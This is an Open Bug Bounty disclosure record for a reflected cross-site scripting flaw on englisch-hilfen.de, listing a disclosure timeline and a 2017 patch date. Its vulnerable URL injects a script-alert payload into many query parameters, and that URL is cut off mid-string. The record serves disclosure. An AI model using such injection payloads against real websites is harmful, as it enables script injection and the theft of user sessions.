englisch-hilfen.de XSS vulnerability

2016-09-30T10:15:00
ID OBB:184275
Type openbugbounty
Reporter XSSbot
Modified 2017-11-24T18:54:00

Description

Vulnerable URL:
http://www.englisch-hilfen.de/board/index.php?csrfToken=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution10;_3=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution2;_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution4;_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&assignment;_name=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&assignment;=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution3;_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution9;_1=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&solution7;_2=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&language;=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E✓_solutions=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%2
Details:

Description| Value
---|---
Patched:| Yes, at 24.11.2017
Latest check for patch:| 24.11.2017 18:54 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 22176
VIP website status:| Yes
Check englisch-hilfen.de SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 September, 2016 10:15 GMT
Generic security notifications sent to website owner| 30 September, 2016 10:18 GMT
Vulnerability details disclosed by researcher| 7 October, 2016 11:13 GMT
Vulnerability patched by the website owner| 24 November, 2017 18:54 GMT